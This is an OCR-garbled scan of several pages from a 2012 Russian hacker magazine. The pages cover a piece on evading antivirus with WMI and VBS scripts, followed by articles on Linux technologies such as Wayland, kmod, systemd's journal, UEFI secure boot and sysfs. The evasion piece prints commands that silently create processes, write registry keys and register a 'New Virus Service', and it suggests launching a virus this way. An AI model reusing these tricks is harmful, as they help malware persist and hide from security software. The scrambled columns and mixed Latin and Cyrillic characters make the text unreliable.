Cur1•e n t U e J'S io n ''-f 11 с k_a u e Вы n о11 н е нм е
1 r:l
11 ict•o:.oft \.Ji n ~o11:> ХР [ Верс и я S . 1 . 2ЫJB J (С) Кор п ора ци я " '"·i t<pocooт. 19 8 5-2001. / N м'leSpace:,·ч·oot\,dcfcн,lt
Cla:;::; StdRegPl"ou sSнbKe yN<•ne " "SOFТ\IARE ' ' t1 ic l"osof t' \. llindo11::o''
t•::; ''
<Std RcgPt•o u )- >C t•cdtcl<c
все, что можно сделать, используя WMIC. WMIC могут быть также
_PA R A rt EТERS
{ Re tнJ• nU rt l Lie
>;
=
ставляют основной круг задач администраторов и информацию, в которой они могут быть заинтересованы. Однако это еще не
у()
!k n еuн ыЙ B ЬI JOB tiCfO D d . Пар<нt сr ры Pыt~ond :
in::;t,\n ce o f
псевдонимов может быть выведен с помощью набора команды
«WM IC /?>>. Им еющиеся в нашем распоряжении nсевдонимы nред
исnользованы для nрямы х за прос ов к WMI-cxeмe. Это даст тебе
0;
достуn ко всем имеющимся классам, а не только к тем, которые
nредоставляются с nомощью nсевдонимов. Н аnример, чтобы
3апуск програнны
создать nроцесс, достаточно в ып олнить в открывшейся командной ВвеАIНе 1111я nporpot1НЫ, n.on101, дсжунент~
ресурс.!! Интерttетll, н
--
Windows откроет
111111
строке pгocess call create "calc.exe". Из известных аверов на такое
нх.
Открыть: 1jNмiC /Ni!IГГie59oce:\\root.\defd Смs StdReQPr
создание nроцессаникто даже ухом не nовел. А что, если таким об
::::J
разом заnустить на исnолнение вирус? Н у и nоследний булыжник в огород красивых «решений по
100 % безопасности
вашего ком
nьютера>>, - смотрим, как легко <<брюки nре вр ащаются в шорты>> :
Беспалевная запись в ре естр
wmic / NameSpace:\ \root\default Class StdRegProv Call CreateKey hDefKey= " &H80000002" sSubKey Nam e= " SOFТWAR E\\Micro soft \\Windows \\CurrentVersion \ \fuck_avers "
Обрати внимание на параметр ShowWindow: ес ли хочешь скрыть окно твоего приложения, то используй параметр SW_
HIDE =О. Н а скрине ты можешь видеть, как в списке проце ссов
Заnусти этот код на выnолнен ие, посмотри на результат, а потом
taskmanageг'a болтается заnущенный таким образом «блокнот»,
- на «лучшее решение для защиты>>, которое обесnечивает так
однако на nа н ели задач ничего нетl Второе- э то заnись в реестрl
на зы ваемую «безоnасность>> т воего компьютера, n оплачь и иди
Да-да, исnользуя vЬs-скрипты, можно легко nисать в реестр !
выкидывать е г о на nомойку. Если заnуск vЬ-скриnтов аверами
худо-бедно палится [ хотя и далеко не всеми], то в данном случае ни о дин из десяти протестированных мной антивирусов [а тестировал
const HKEY_LOCAL_MAC HINE = &Н80000002 strComp ut er = "." Set ob jR eg=GetObj ect( _ "winmgmts:{impersona t ionleve l =impersonate}! \\ " & strComput er & " \ root \ default:StdRegProv" )
я только самые nопулярные] не смог отловить такую хитропоnую заnись в чувствительные ветки реестра. П о-моему, уже не смешно.
ЗАК ЛЮЧЕНИЕ Ит ак, nодведем итоги. Заметь, я не рассматриваю в данной статье
strKeyPath = "SYSTEM\\CurrentControlSet \ \Services \\MyService" objReg . CreateKey HKEY_ LOCAL_MACHINE, str KeyPath strVa lueName = "Descrition" strVa lu e = " New Virus Service " objReg.SetStringValue _ HKEY_ LOCAL_MAC HINE ,strKeyPath,strValueName,strValue
каки е-то уязвимости оnерационной систе мы, по зволяю щие вы
nолнить зловредный код на целевой машине, которые являются недоглядом разработчиков Windows,- их и так хватает. Сегодня мы уви дели, что можно запросто, исnользуя только законные сре д
ства оnерацион ной с ист емы, выбираться из тех клеток, которые ставят «честным хакерам>> разработчики антивирусов и nроактив ных за щит.
:::r:
В данном случае ветка рее стра HKEY_LOCAL_ MACHINE \
SYSTEM\CuггentContгoiSet\Seгvices\ исnользуется для старта системных служб и сервисов Window s, в том числе загрузки драй веров. П равда, тут есть одно ограничение, о котором ты, думаю, слышал . Д анный метод nройдет для Windows ХР, но не для <<се
мерки>>, - в Win7 писать в ветку HKEY_LOCAL_MACHIN E не дадут.
DYNAMICWRAPPERX
Однако есть возможность использования аналогичного скрипта для заnиси в HKEY_C URRENT_ USER . Отмечу сразу, что указанные сnособы nробивают не все, но большинство антивирусов. К nриме
В контексте данной ста тьи не могу не упомянуть о чуде nод
н азва н и ем Dyna micWгappeгX [scгipt-cod ing . com/dynwгa px .html ].
ру, описа нны е ниже т ехники тестиравались мной около года назад,
Он а не имеет nрямого отношения к
и из десяти антивирусов со стандартными настройками безоnас
т ебе нужно о ней знать . Зто АсtivеХ-комnонент [СОМ-сервер!,
ности лишь одИн заблокировал создание процесса и заnись в чув
который предоставляет возможность вызывать из яваскриnтов
ствите льные ветки реестра [в частности, HKEY_ LOCAL_MACH INE\
и VВ -с криnтов функции, эксnортируемые dll-библиотеками,
50 FТWAR Е \ М icгosoft\Wi ndows\C uггentVeгs io n\Ru n], за ложенные
в частности, функции
в vЬs - скриnте. Все остальные- как бы сказать nомягче- nро
WMI, но мне кажется, что
Windows API .
Вызвать напрямую , скажем , функцию CгeateWindowEx из
vb-
нельзя , интерфейс nод это не заточен. И вот автор Dynami c WгappeгX
шляnили выполнение nотенциально оnасного кода.
-замечательный nрограммист Юрий Попов- оза дачился этой
ТЕ ЖЕ ЯЙЦА, ВИД СБОКУ
nроблемой и ус nешн о ее решил.
Дл я исnолнения трюковнеобязательно исnользовать VB- и Jаvа
С помощью nроцедуры регистрации СОМ - серверов в системе:
скриnты. Существует вnолне адекватная командная строка,
"гegsvг32.ex e dynwгap x .dll" , устанавливаем DynamicWгappeгX
которая nустит нас в оболочку WMI IWMI command-line]. Для это го
в систе му и nолучаем крайне очаровательную возможность
нужно выполнить команду <<wm ic >>. Суть командной строки WМI
вызывать WiпАРI-фун к ции из VВ/Jаvа-скриптов!
выполнение того же скриnта, как если бы он был оформлен в виде
Дела е тся это nримерно так :
VBS- или JS -кода. Командная строка WMI включает серию «nредваритель но за готовленных>> WMI-зanpocoв, изв естных как nсевдонимы. Ты смо жешь nросмотреть содержание любого псевдонима, просто набрав
Set DX = Crea t eObj ect( "DynamicWrapperX" ) OX.Reg i st er "kernel32" , "Веер" , "i=uu" ОХ.Веер 800 , 1000
в командной строке «WM IC>>, а следом- имя этого nсевдонима. Например <<W MIC QFE >> выведет список всех <<запла ток >> и nа кетов
Как можно ее nрименить- решать тебе , но согласись, что довольно
обновлений, установленных на комnьютере. П олный список всех
удобная штука!
ХАКЕР
04/159/2012
101
www.epidemz.net
UNIXOID
Юрий << Adept» Видинеев ladeptglagmail.coml
HOBble
1
i'
требуют перемен Мир OpenSouгce привлекает своей динамикой. В нем постоянно что-то происходит: системы, концепции, стандарты
~ ' '
сменяют друг друга
) J.
r, \ 1
с бешеной скоростью, причем с каждым годом
l
~
темп только увеличивается .
Об основных актуальных
. , 'fj
направлениях развития
...
~
свободных решений мы сегодня и поговорим .
'
-- · ~( ( '. ..
-----~;/
ОПИСАНИЕТЕХНОЛОГИЙ БЛИЖАЙШЕГО БУДУЩЕГО, ИДУЩИХ НА СМЕНУ ТЕХНОЛОГИЯМ ДНЯ ВЧЕРАШНЕГО
..• 1
....
"'·L"
..
·' о
'
,_..
~~·:.··~
1~ Однооконный режим в
,2: "
www.epidemz.net
r·
Gimp 2.8
ХАКЕР
102
с
04/159/2012
Новы е времена требуют перемен
~
- : bash
Edit
File
Vi ew
Bookmarks
Settings
v
[user@myarch -]$ 1s -1 /bin/1smod 1 rwx rwx rwx 1 root root 13 Jan 17 01:06 [user@myarch -]$ 1smod 1 head -3 Modu1e Size Used Ьу vboxvid~o
1869 188362
drm [user@myarch -]$ kmod 1ist 1 Size Modu1e 1869 vboxvideo 188362 d rm [user@myarch -]$ 1 ' lill просто ссылка на
Х : REVOLUTION Wayla nd- э т о п рот око л
/usr/bin/kmod
->
1 2 vboxvideo head -3
Used
Ьу
1 2 vboxvideo 1" lv
-: bash
lsmod -те перь
х
h
Help
1
kmod
и е г о д е м о н с тр а ци о н
на я р еа ли з ация [на С , о бъем кода с ос т а вля е т
ме н ее 10 000 с трок, лицензия- MITI, ид у щи й
клиент [ о в е р хе д при это м обещает бы ть н е
Jouг n al , к о т ор ый появил ся в рели з е
очень бо льшим) .
38.
Н е то ч т об ы
Wayland с ов с ем новый пр оек т 200 8 года ), но в е лик а
анал о гичную
[ р аз р аб от к а ведется с
sys temd
М о д уль п ре д оста вля ет ф у нкциональн ос т ь,
syslog,
но с н е к о торыми особ е н
ностями . Для нач а ла ра з ра б отчики отмечают
на сме н у ни мн о го ни мал о Х - с ервер у l О сно в
в ероя т нос ть, что чере з п а р у -т р ойку л е т он о ка
у с т а ричка
на я п ричина- Х ус тар е л: ег о архит екту р а на
жется во в сех д ес ктопны х и мобильных лин ук
ти л е т, целый с пи сок н е д ос т а тков.
се г о дн я шни й д е нь неакт у альна , а код с л ож н о
сах . Бла г о , п е рвы й стаб иль ный релиз
по дд е рживать .
за горами -во з можн о да же, чт о он ув идит с в е т
какая -либо ау т е нти ф и ка ц и я о тправит е ля :
до моме н т а в ых о да д а нног о н оме р а в п е ч а ть .
ес л и процес с пр е дст а вится , чт о он
Гла вная особ енн ос ть
не ни е в о дин эл е м е нт и ли
Wa yl and- об ъ е ди [Wayland Compositoг
Wa yland S e гveгl т о го , что в архитектур е Х
1.0 уже
KMOD : EVOLUTION
и мен е джером о к о н .
р аз р або тчиков и з
Composi to г им е ет
Weston,
10000, то так и
о к о л о тридца
sy slog
о т су тств у ет
mysql
на
буд е т записано .
О тсутствуету твержд е нный формат, в кото
В конце n рошлого г о да не с кол ько из ве с тны х
Wayland
П ри приеме сооб щ ени й в
п о р ту
б ыл~соб с тве нно ,Х- с ервером, композитором по к а един с твенн у ю реали з ацию-
не
syslog, кото р о м у у ж е
RedHa t н аписали
отк рыт о е
р ом логирую т с я данны е. Это сильно затр уд н яет парси н г лог ов и вынуждает и з м е нять
п и с ь мо, в ко тор о м п е р е чи с л или возмож но ст и,
скрипты па р с инг а п ри любых изменения х в ыво да в лог в программах.
ко т о р у ю с оздают ра з раб о тчики прото ко ла
к о т орые о ни х отели б ы р еа лиз овать в ядре
Wayland. В н едалеком будущем ожидает с я nод де ржка Wayland у Comp iz и Kwin. При этом все
Li nux и
б ыл о на э то время: goo.g[/RWgbl. Пр о шл о не
о п е р а ции по рендеринг у окна будет выполнять
с к о л ь к о м есяцев , и одна из «хотело к>> у вид е ла
S у s lо g-лиш ь одна и з многих систем жур
Wa yl and Cl ient [то е сть с амо прилож е ние ). Это
с в ет под и м енем
налир о вания , р аб отающих в
ни з коуровневых утилит ах, ес ли бы у них
В запис ях отс у тству е т информация о часо вом по я с е .
из о бражений, возникающих в Х Sегvег, а также
kmod. Пр е дс т а в ляе т с о б о й заме ну module-init-tools [па кета . со д е ржаще го у тилиты для управления модул я ми ядра : lsmod,
л а ги в с евозможных приложений. Когда лаги
у меньшить время отрисовки изменений. Еще
modpгobe, гmmod и другие) , основное преиму
так раскиданы по системе, сложно искать
одним nлюсом является возможность работы от
щества- использование библиотеки
связи междусобытиями в них.
имени непривилегированного пользователя.
которая также мож е т и с пользовать с я в любых
Так как в лага х отсутствует какая-либо
прил о жениях [лицензия-
индексация, и х чтение очень незффективно
п о зволит избавиться от ошибок ренд е ринга
Так как
Wayland
завязан на такие штуки,
libkmod,
LGPLv2 и старше). приложение- udev. Раньше
Linux: есть еще
utmp /w tmp / Ыmp , lastlog , лаги ядра, а также
[при поиске приходит с я перебирать все
как Diгect Rendeгing IDRII, KMS IKeгnel Mode Settingl и GEM [Gгaphics Execution Manageгl , то бегать он может только поверх Linux и пока
при загр у зке несколько с отен раз вызывалась
внешняя утилита modpгobe [и nри этом не всег
Сетевой протокол
только со свободными драйверами для видео
да успешно- могло оказаться, что модуль уже
ции,нооченьограничен:вчастности,никак
карт
загружен) , а использование
не гарантируетдоставку
lntel, Radeon
и
Nouveau.
Одной из часто критикуемых вещей в но
Первое подобное
libkmod помогло
существенно снизить накладные расходы на
строчки).
syslog
пр ост в реализа
И з логов легко удаля т ь данные, чем часто
чтение файла конфигурации и построение
пользуются при взломе для заметания сле
подсистемы [наподобие той, что с незапамят
списка доступных мод улей при каждом вызове.
дов.
ных времен была в Х111 . Эта критика не совсем
Уменьшение времени загрузки nри переходе
Ограниченные средства контроля достуnа:
оправдана- просто сам протокол
на новый
пользователь или имеет доступ ко всем за
сетевой подсистемы, но зто не мешает реа
udev заметно даже на глаз. Кроме udev, с kmod возможно скоро научится работать systemd. Агсh Linux, как обычно, впереди пла
лизовать сетевое взаимодействие на уровне
неты всей и с января этого года уже использует
можность сохранения метаданных записи.
композитора.
kmod версии 4. В экспериментальном репозито рии Debian также присутствует kmod версии 3.
учитывает оставшееся на разделе место и не
вом протоколе является отсутствие сетевой
Wayland
не включает в себя описания реализации
Поддержка[nравда , покавесьма о г рани
ченная! Wayland уже есть во многих проектах: Qt, GTK, EFL IEnlightenment Foundation Libгaгyl, Clutteг, SDL. Приложения, не использующие
писям в логе, или не имеет их вообще.
Практически полностью отсутствует воз Ротация логов тоже не совершенна: она не
умеет динамически менять интервалы , что
SYSLOG: DESTRUCТION
позволяет проводить ОоS-атаки.
ни один из этих тулкитов [а таких не очень
Systemd- система инициализации [замена для SysVinit и Upstaгtl, которая используется
много),тоже поддерживаются- достаточно
во все большем количестве дистрибутивов. Но
Невозможность сохранения бинарных дан
просто запустить Х.Огg-сервер как
речь пойдет не о ней, а о модуле под названием
ных типа coгedump.
ХАКЕР
Wayland-
Компрессия поддерживается только после ротации .
103
04 / 159/ 201 2
www.epidemz.net
UNIXOID Отсутствие возможности журналирования событий на этапе ранней загрузки или перед самым выключением ОС . Jouгnal также имеет особенности:
Все данные хранятся в формате «ключ значение». Ключи и значения могутбыть произвольные, значениями могутбытьдаже
бинарные данные .
1
liveuser@localhost:Файл
Правка
Вид
Поиск
Терминал
[liveuser@localhost -]$ getcap /bin/ping /bin/ping = сар net raw+ep [liveuser@localhost- -]$ 1 Б ольше ни к а к и х
С<
•1
Справка
i
SUID
Записипроиндексированы, ч тозначитель ноувеличиваетскоростьпоиска.
SU I D /SG ID -биты будут постепен н о за
Заманчиво, конечно. Е сли бы не одно «НО>>
Компр ессия будет исnользова на и для лога,
-данные будут храниться в бинарном виде,
менены на capaЬilities - механизм ядра,
в который в данный,....юмент идет запись.
то есть никаких тебе tail, less и gгер напрямую.
с помощью которого можно гибкоуправлять
Для каждой записи будетсоздан ее хэш.
Перевесят ли все плюсы этот минус- покажет
привилегиями. Многие уязвимости недавне
который образуется не только из самой
время.
го прошлого были связаны с использовани ем бинарников с SUID-битом.
записи, но и из хэш а предыдущей. Таким
образом можно будет по цепочке проверить
целостность всего л ога !например, на пред метудаления записей]. П одобный механизм уже давно успешно примен яется в git. Поддерживается API syslog 1с некоторыми расширениями] - не придется переписы вать приложения.
В озмож но сть гибко ограничить количество записей в лог за одну секунду. Это ограни чение может меняться
no заранее заданным
НОВЫЕ ВРЕМЕНА, НОВЫЕ СТАНДАРТЫ
chгoot, возможно, усту пит место более со време н номуинструментудлязапускаподо
Е сть еще пара интересных вещей , которые не
зрительного кода и изолированной работы
представляют из себя чего-то принципиально
приложений - libv iгt-sandbo x. Основанный
нового, а nросто изменяют годами устоя вшие
на libviгt, при запуске он создает вирту
ся моменты.
альную машину, в качестве корневой ФС
Каталоги /Ьin./sЬin./liЬ!/Iib64] будут совме щены с соответствующими каталогами в/usг. П о крайней мере в Fedoгa la это значит, что
которой используется корень хает-сис темы , смонтированный в режиме гead-only. Дебют инструментадолжен произойти в Fedoгa 17.
впоследствии с большой долей вероятности
правилам в зависимости от количества
и в большинстве RРМ-д истрибутивов ]. Для
свободного места на раздел е.
обеспеченияобратнойсовместимости на
большинство перечисленных радикальных
В общем-то, ничего удивительного, что
Ротациябудетосуществлятьсяавтомати
старом месте будут симлинки. Таким образом
перемен происходит в F edoгa - ее разработ
чески,безприменениястороннихутили~
все неизменяемые части системы теnерь бу
чики любят ломать устои: взять хотя бы н еда в
П ри поиске активный и архивныелаги будут
дут лежать в одном месте, что позволит проще
н ее переименова н ие сетевух в зависимости
выглядеть как единое целое.
смонтировать их в гead-only, проще создавать
от их расположения на материнской плате.
Може т объединить в себе лог и в сех при
виртуальные окружения и снаnшоты файло
В Сапопiсаl же больше любят эксперименты
ложений, в том числе utmp/wtmp, журналы
вой системы . В качествеуспешного примера
с интерфейсами. Очередная инновация
загрузки и другие.
подобной иерархии приводятSоlагis 11.
Ubuпtu HUD IHead- Up Disp lay]: система меню,
НАВИСШАЯ УГРОЗА UEFI (Unified E x teпsiЫe Fiгmwaгe lпteгface)- грядущая замена уже порядком устаревшему BIOS, которая представля е т из себя скоре е
уж е не получится (прив е т пользователям Geпtoo),- точнее, получится ,
мини-ОС со своими драйверами, сетевым стеком, интерфейсом
но ядро надо будет подпи с ать с обственным ключом, а его открытую
с поддержкой мыши, локализации и многим другим . Плюсов от
часть как-то залить в х ранилищ е ключей
внедрения UEFI много, начиная с (как ни странно) возросшей скорости з агрузки и за к анчивая нэйтивной поддержкой нового формата
разбиения дисков GPT (не имеющего ограничений MBR) . Но и минусов у
UEFI
тоже предостаточно . Основной на сегодняшний день- зто баги.
Размер д е рева ис х одников
UEFI занимает около 35 Мб (для сравн е ния,
пр е ду с тан о вленной . Да и запустить самостоятельно собранное ядро
UEFI . Red Hat, Canonical Linu x Foundat ion отреагировали на это нововведение составлением с вои х р е ко м ендаций к к он е чной реализации , а FSF- петицией к производителям оборудования, в которой secure boot называется restricted boot (в случае некорректной реализации) . и
Кроме пробл е м, свя з анны х с ключами, есть еще nроблема
Liпu x без драйверов весит 30 Мб) , спецификация в текстовом виде
с загру з чи к ом,- са м ый поnулярный на сегодняшний день
-больше
распространяется по
2 200 страниц . И весь этот огромный объем кода еще не
GPLv3,
Grub2
в которой есть пункт против тивоизации ,
достаточно тщательно оттестирован- баги всплывают достаточно
тр е бующий nубликовать ключ в случае подписывания бинарника .
часто .
Предыдущая версия- Grub Legacy- в основном распространяется под GPLv2, но некоторые вспомогательныескрипты-под GPLv3 . Матплаты с UEFI и поддержкой secure boot могут появиться в продаже
Новаянеоднозначная фича версии
2.3 .1, -
UEFI, которая войдет в спецификацию
secure boot . Если не вдаваться в подробности, то
технологию можно описать следующим образом : весь код (точнее,
уже в этом году- возмо ж но , скоро придется учитывать этот асnект
его SHA-256 хэш) , работающий с железом напрямую (драйвера, ядро,
при выборе ж елеза . Пробл е ма становится еще более реальной , так
загрузчик) должен быть подписан одним из нескольки х специальных
как в соответствии с требованиями
ключей (RSA, 2048 бит), открытая часть которых хранится в прошивке
на системник/ноут заве т ную наклейку << CompatiЫe with Windows 8»,
матплаты . Неподписанный (или подписанный не тем ключом) код
производитель будет обязан включить опцию
исполняться не будет . Теоретически штука хорошая- эффективное
рекомендуется предусмотреть механизм для добавления собственных
средство против малвар и , выполняющейся до загрузки ОС (например,
ключей . А для систем на базе
живущей в MBR) . Но с другой стороны, в зависимости от реализации
кнопки отключения
может стать существенно сложнее или (что тоже не исключено) вовсе невозможно установить альтернативную ОС , отличную от
Microsoft для того, чтобы наклеить « Secure Boot ». К тому же
ARM- еще и обязательно отсутствие secure boot. Но это не повод для паники : многие производители (в числе первых- НР и Dell) сообщили, что обеспечат во всех своих новых nродуктах возможность отключить se cure boot .
ХАКЕР
101.
www.epidemz.net
04/159/2012
Новые времена требуют перемен
в которой чтобы выбрать определенный пункт, нужно написать его название в специальном
НЕ ВЗЛЕТЕЛИ
N810 и N900 начиная с 2005 года! и MoЫin ln tel [разрабатывался с 2007 года!. В 20 10 году Nokia и lntel объединили свои усилия для работы над новым ди стрибутивом- Meego,
от
Н овые тех н ологии приходят на сме ну старым
поле. Если результатов поиска н есколько,
по стоя нно, но не в се из них успешны и наход я т
то в ыбранный вариан т запоминается - т ак
свое место nод солнцем. И з прим е р ов по
систе ма подстраивае тся под конкретного
с леднего времени мне особенно за помнились
ко то рый должен б ыл взять все лучш ее от
пользовате ля. В дальнейшем планирует с я
не ско лько.
Maemo
NftaЫes- замена iptaЫes/netfilteг. П люсы:
интеграция г олосо вого поиска . Не стоит пере живать, что классические м еню уберу т,
HUD
п ока н е замена им, а в се г о лишь приятное
более гибкий и расширяемый
ABI , отсут
около тридцати кру nны х компаний ми р ового
ствие д ублирова н и я ко да [ i pta Ыes, агрtаЫеs
дополн е ни е. Описать такую шт уку непро-
и еЫаЫеs - по сути, копии о дн ого и того
сто, нужно попробовать самому. Благ о, это не
же ко да !, нет необходимости перезагрузки всех nравил пр и каждом изменении [из-за
сложно,в Ub uпtu
HUD должен 12.04.
быть интегрирован уже
уровня, управ л ение проектом перешло в руки
Linux Foun dation. П осле вып уска смартфона N9 Nokia потеряла и нте рес к Meego, сосре д о точившись на Windows Ph one . Чт обы дальше развивать проект, в конце прошлого года Linu x Foundation объединила свои нараб отки с LiM o [Linux MoЬilel Foundation под новым именем Tizen и основной концепцией приложений на HTML5. Разработчики Meego, в свою очередь, орга ни зовали фор к- Mer. Н е исключе на возможность слияния Tizen и Samsung Bada .
чего терялось вн утреннее состояние и все
Кроме крупных изменений, ко торые долго
у становленные соединения!. Концепция вы глядела мн огообещ ающе [подробнее можно посмотреть в][ #1 271, но, видимо, этого было
обкатываются , и о которых можно расска зать
недостаточно, чтобы перевесить популяр
НОВОСТИ ОДНОЙ СТРОКОЙ
и MoЫin. П р оек т обещал быть пер
с пективным , заинтересованность выразили
много инт ересного, в ближ айш ее время нас
ность iptaЫes. В Fedoгa, кстати, для борьбы со
ждут и достаточно ощутим ые измене ния в ра з
сбросо м соединений при изменении правил
личных узких областях. Пр о нх также хоте л ось
с делали с пециаль ную прослойку- fiгewaii D ,
Возможно, нас опять ждет но вое имя для ОС,
бы упомянуть.
- которая сохраняет свое состояние. В Fedoгa
у которой уже было больше названий, чем
1Pv6. Давно не дик овинка.
Б олее того, благо
даря заканчиваю щ емуся пулу 1Pv4 и регу лярно пр ово дим омуWогld
17
1Р v6уже
1Pv6 Day,
этот динамический файрвол, ск о рее всего,
работающих nод ее у n равлением устройст в на
будет использоваться по умолчанию.
рынке .
Второй пример подобногонеудачного
НАДЕЕМСЯ И ВЕРИМ
д оста т очно широко используется . Н овость
проекта - дистрибутив
заключается в реализации
и встраиваемых устройств от
Во всех этих нововведениях я ви жу только по
личны е патчи, реализующие эту функцио
На чина ла сь эта ОС с двух
ложительные моменты. Н адеюсь, они nрой д у т
нальн ость, конечно, существуют д остаточно
от
1Pv6
N АТ. Р аз
давно, но ско ро мы увидим з т о в netfilteг из
Linux
для мобильных
Linux Foundation. проект о в: Maemo
Nokia [с ней поста влялись прародите ли современных пл аншетов Nokia 770, NBOO,
исnыта ние временем и не останутся на сва лке
ист ории. :Х:
коробки.
FIOPS [ Faiг lnput/Output Opeгat ions Р е г Secondl- новы й планировщик ввода/вы во д а, предна з н а ченный для работы с SSD. П о
Way land
Х C l ieпt
C l ie п t
принцип у д ейс твия он похож на популярный
сейчас CFQ [и заимствует у него часть кода!, но уч итыва еттак ие свойства
Waylaпd Clieпt
SSD, как вы
сокие скорости чтения и записи, неб ольшие
Х Client
ф Ф ХТ)
за д е р жк и , различную «с тоим ост ь » чтения
запроса от е го ра зме ра. Н аибольший отрыв
oтCFQ н овый планировщик nоказывает
Wayland Compositor
в те с та х со сме шанным гead /w гite профиле м.
@\
Код еще не протестирован, п оэтому, думаю,
раньше, чем в
Linux 3.5
мы его врядли уви
ф
KMS
дим.
ext4-snapshots- реализация снапшотов для ext4 [по аналогии с теми, что есть в Ыгfsl. У снапшотов на уровне ФС довольно много плюсов nеред снапшотами на базе
LVM : нет
р е али з ующая не во з мо ж ность з ап уск а на
у стройств е м одифи ц иров анн о й в е р с ии nрошив к и .
..
и зап иси, зависимос ть скорости выполнения
• Тивоизация - nроц е дур а ,
~.
Xserver ~ Compositor
По н ят ие пошло от медиаллеера TiVo.
• utmp/wtmp/ Ыmр-фа й лы
в бинарном форм а те,
®
evd ev
ф
KMS
Kerne l
evdev
Kernel
в к оторы х х ранится
информация о текущи х
nользователя х в с истем е, лог
всех в ходов/ вы х одов и з с и стемы
Ар х ит е кт у ра
Wayland в
с равнении с ар х ит ект урой Х
Serve r
ин еуда ч ны х поn ы то к
необходимостизаранеерезервировать
ав т ори з ации .
место под снапшот, даже nри большом
•
Подробно мо ж но
количестве снапшотов производительность
о
не сильно падает. Правда, не факт, что эти
nрочитать в ][
systemd
148.
патчипопадут в ванильное ядро- патчи
со снапшотами для
ext3 [N EXT31 оттай же
команды пока туда так и не вошли.
В
Gimp 2.8, релиз
• До статочно FAQ по wayland :
ко т орогодолжен состоять
nодробный
ся в первой половине этого года, наконец-то появится долгожданный однооконный
• Планы
интерфейс.
по
р аз р аб о тке Х12:
В скором времени большое количество ОреnSоuгсе-шутеров сможет перейти на ис пользование движка
id Tech 4, на базе кото Doom 3. Д вижок был недавно открыт компанией Zenimax [спасибо Джану рого построен
Кармакузазамечательнуютрадициюiпод
GPLv3 [с небольшими nоправками ! .
ХАКЕР
Демонстрация работы
Wayland . Пока в X.Org
04/ 159/2 012
105
www.epidemz.net
UNIXOID
Евгений Зобнин
РАЗБИРАЕМСЯ С KOBJECTS, SYSFS,
UDEV, UDISKS И UPOWER
[zobn inlagmail.co ml
l:lфiШIЩ!i Строго говоря,
sysfs-
это только один из кирпичиков системы
умного управления оборудованием, появившейся в L iпux в по следние годы. Сама по себе эта файловая система практически
беспол е зна и может дать желаемый результат только в сочетании с другими системами, построенными на ее основе, таки м и как
udev
[динамически создаю щ ей файлы устройств в катало г е /devl, udisks [автоматически монтирующей файловые системы вновь подк л ю ченн ых накопителей] и upoweг (системы управ л ения питанием , реагир у ющей на сообщения подсистемы
ACP I и
по д с т раивающей
параметры системы, используя sysfsl. Н о начнем с корневого элемента.
Одним из главных новшеств ядра
версии
2.6 стала
Linu x
поддержка виртуальной
файловой системы
sysfs,
экспортирующей
информацию об установленном оборудовании и позволяющей управлять его настройкой . Сегодня возможности
sysfs
широко
И
SYSFS
превратилось в
2.6,
2.5, которое после стабилизации
была переработка и унификация модели драйве
ров, которая к тому времени стала слишком громоздкой, запутанной и сложной для понимания. С этой целью была придумана абс т рак ция, названная
KObject-
простая структура данных, позво л яющая
однозначно идентифицировать и связывать между собой различные
используются во всех дистрибутивах для определения железа, автоматической
устройства, которые « видит>> операционная система. Фактически, теперь каждое устройство, начиная от системного таймера и закан чивая SСS I -приводом , было привязано к собственному уникальному
загрузки модулей и монтирования файловы х систем. Но что представляет собой данная
ФС , и какие плюсы она может дать обычным юзерам, знает далеко не каждый.
KOBJECTS
Одной из целей разработки ядра
К-объекту, который не только позволял точно иде н тифицировать его , но и связать с другими К-объектами по принципу <<родитель потомок >>. Например, usЬ-порт является <<родителем >> воткнуто-
го в него usЬ-устройства. Также были придуманы специальные
объединения К-объектов [ksetl для представления различных под систем, но в контексте данной статьи это роли не играет.
www.epidemz.net
t t t
Звень я од н ой ц е пи
ali as alias alias alias alias alias alias a l ias alias alias alias alias alias alias alias alias alias alias alias alias alias alias ~ lias
pci:v0000 1022d*sv*sd*bc04sc03i 00* sп d_hda_in te l pci:v00001002d*SV*Sd*bc04s c03i 00* snd_hda_i nte l pci :v0000 15ROd00001 977sV*Sd*bC*SC*i* snd_ hda_int e l pci :v00 0 0 1 7 F З d 000030 1 0sv*s d *bC*SC*i* snd_ hda _i ntel pci :v0000 1102d00000009SV*Sd*bC*SC*i* snd_hda_intel pci :v00006549d000 01200sV*Sd*bC*SC*i* snd_hda_intel pci :v0000100Ed*sv*sd*bc04sc03i00* snd _hda_intel pci:v000010B9 d 000054Бlsv*S d *bC*SC*i* snd_hda_intel pci:v00001039d00007502sv*sd*bC*SC*i* snd_hda_intel pci :v000 0 1 1 0Бd 0 0 00 3288sv*sd*bc*sc*i* snd_hda_ intel pci:v00001002d0000RR48sV*Sd*bC*SC*i* snd_hda_intel pci:v00001002d0000RR40sv*sd*bC*SC*i* snd_hda_intel pci :v00001002d0000RR38sv*sd*bc*SC*i* snd_hda_inte l pci :v00001002d0000RR30sV*Sd*bC*SC*i* snd_hda_intel pci :v00001002d0000RR28sv*sd*bc*sC*i* snd_hda_intel pci :v00001002d0000RR20sV*Sd*bC*iC*i* snd_hda_intel pci :v00001002d0000RR18sv*Sd*bC*SC*i* snd_hda_intel pci :v00001002d0000RR10sv*sd*bC*SC*i* snd_hda_intel pci:v00001002d0000RR08sv*sd*bc*SC*i* snd_hda_intel pci :v00001002d0000RR00sv*sd*bc*sc*i* snd_hda_intel pci:v0000 1002d0000970FSV*Sd*bC*SC*i* snd_hda_intel pci :v00001002d0000960Fsv*sd*bc*sc*i* snd_hda_i ntel pci :v00001 002d00007919sv*sd*bC*SC*i* snd hda intel
/sys/class/ -
по
к л ассам.
В /sys/device можно найти любое устройство, известное ядру, однако для удобства предусмотрены еще три мета-каталога, ко торые группируют устройства различными способами. Обращаясь
к файлам внутри них, ты так или иначе попадешь в нужное дерево
1
sys/devices по символической ссылке. Также sysfs предлагает не сколько с пециальных каталогов для сервисных нужд:
зак р ы тые файл ы
/sys/firmware/ -
fi rmwa r e,
нуж ны е для
ра бо т ы
некоторых уст р ойс т в;
/sys/fs/ -
FUSE
у п равле н ие фай л овыми
(на п р и мер
интерфейс
(профи л ирование, каталогу на
деба г
и
каждый
ос н ова нными
на
н изкоуров н евого у пр ав л е ни я
ядром
т ак далее);
все модули,
/ sys/modul e/ -
сис т емами,
и ФС);
ext4
/ sys/ k ern el / -
загруженные я д ром,
(обыч н о есть п од катало г
- по par ameters ,
позволяющий у п равлять о пци ями модуля);
/s ys / power / -
'1 Ч а сть фа й ла
груп п ировка устройс т в
ко нт роль
п а р аме т ров э н ерго п от ребле н и я.
